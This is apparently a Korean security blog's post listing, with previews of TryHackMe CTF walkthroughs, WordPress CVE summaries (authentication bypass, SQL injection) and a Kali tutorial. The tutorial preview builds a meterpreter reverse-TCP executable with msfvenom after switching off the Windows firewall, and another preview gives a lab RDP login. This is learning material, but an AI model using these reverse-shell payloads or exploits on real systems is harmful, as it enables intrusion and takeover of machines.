모의침투 8

TryHackMe | Retro - OSCP 챌린지

Task 1 Pwn1. user.txtnmap 포트 스캔부터 해주겠습니다nmap -sV -sC -Pn 10.10.216.128 열린포트 내용80/tcp open http Microsoft IIS httpd 10.03389/tcp open ms-wbt-server Microsoft Terminal Services 윈도우 서버를 이용하고 있네요 웹 서버로 들어가 보겠습니다 윈도우 서버 홈페이지가 보입니다 gobuster 로 숨겨진 경로를 찾아보겠습니다gobuster dir -u http://10.10.216.128/ -w '/home/kali/Downloads/directory-list-2.3-medium.txt' /retro/ 라는 경로가 발견됬습니다 그 해당경로로 진입해 보겠습니다..

TryHackMe | CTF 2024.12.08

TryHackMe | tomghost - CTF 모의해킹

TASK 1 : Flags 1. ANSWER : 머신에 있는 user.txt 파일을 찾으시오nmap 포트 스캔부터 해주겠습니다nmap -sV -sC -A 10.10.59.86 출력내용nmap -sV -sC -A 10.10.59.86 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-17 04:09 ESTNmap scan report for 10.10.59.86Host is up (0.26s latency).Not shown: 996 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu L..

TryHackMe | CTF 2024.11.17

[CVE-2020-8772] Wordpress 1.9.4.5 Authentication Bypass

CVE-2020-8772 세부정보- 인증우회 취약점 - Authentication Bypass- 관리자 계정 이름만 만 있어도 로그인 가능 CVE-2020-8772 설명CVE-2020-8772 취약점은 1.9.4.5 버전에서 발견된 인증우회 - Authentication Bypass 취약점 입니다 이 취약점은 플러그인에 iwp_mmb_set_request 라는 함수에서 인증우회를 할수있는 점에서 발생한다. 공격자는 Wordpress 관리자 계정에 이름만 알고있어도 로그인을 할수있다. POC 제작https://blog.sunggwanchoi.com/kor-infinitewp-client-1-9-4-5-authentication-bypass/ [KOR] 취약점 분석 - CVE-2020-8772들어가며 이 글..

취약점 | CVE 2024.11.17

[CVE-2024-1017] [POC] Wordpress SQL 인젝션 취약점

CVE-2024-1070 세부정보취약점 종류 : SQL INJECTION Ultimate Member 플러그인 SQL INJECTION 취약점Ultimate Member 플러그인은 사용자 프로필, 등록, 로그인, 회원 디렉토리, 콘텐츠 제한 및 회원 자격을 관리하는 WordPress 플러그인입니다. 하지만 버전 2.1.3부터 2.8.2까지의 이 플러그인은 사용자가 제공한 입력을 제대로 검증하지 않아서 SQL 인젝션 공격에 취약합니다.https://nvd.nist.gov/vuln/detail/CVE-2024-1071 NVD - CVE-2024-1071CVE-2024-1071 Detail Awaiting Analysis This vulnerability is currently awaiting analysis..

취약점 | CVE 2024.10.01

TryHackMe | Windows PrivEsC 모의해킹 Task1,Task2

TASK 1 Deploy the Vulnerable Windows VM설명현재 이 랩은 다양한 권한 상승을 소개하는데 중점을 두고있습니다 Tib3rius 가 만들었고 Windows Privilege Escalation for OSCP and Beyond 중점을 둔 랩이라고 보시면 됩니다 RDP는 포트 3389에서 사용 가능해야 합니다 (서비스가 시작되기까지 몇 분이 걸릴 수 있습니다). "user" 계정으로 로그인하려면 비밀번호는 "password321"입니다 xfreerdp /u:user /p:password321 /cert:ignore /v:[IP]위와같이 들어가시면 됩니다 TASK 2  Generate a Reverse Shell Executable설명  오케이 좋습니다 이제 msfvenom 모듈을..

TryHackMe | CTF 2024.09.08

KALI LINUX | 윈도우 10 모의해킹 Reverse_tcp

Metasploit & msfvenom 활용해 윈도우 10 모의침투.윈도우 10 방화벽 설정 설정관리 메뉴 클릭 이와 똑같이 다 끄기 Msfvenom 설정아래와 같이 작성 msfvenom -p windows/meterpreter/reverse_tcp LHOST=자신의 IP LPORT=4444 -f exe > 파일이름.exe  이런식으로 뜨면 성공 !  msfvenom 으로 만든 악성파일이 보임. Metasploit 설정 메타스플로잇 실행 모듈 설정 msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp  msf6 exploit(multi/handler) > set payload /windows/meter..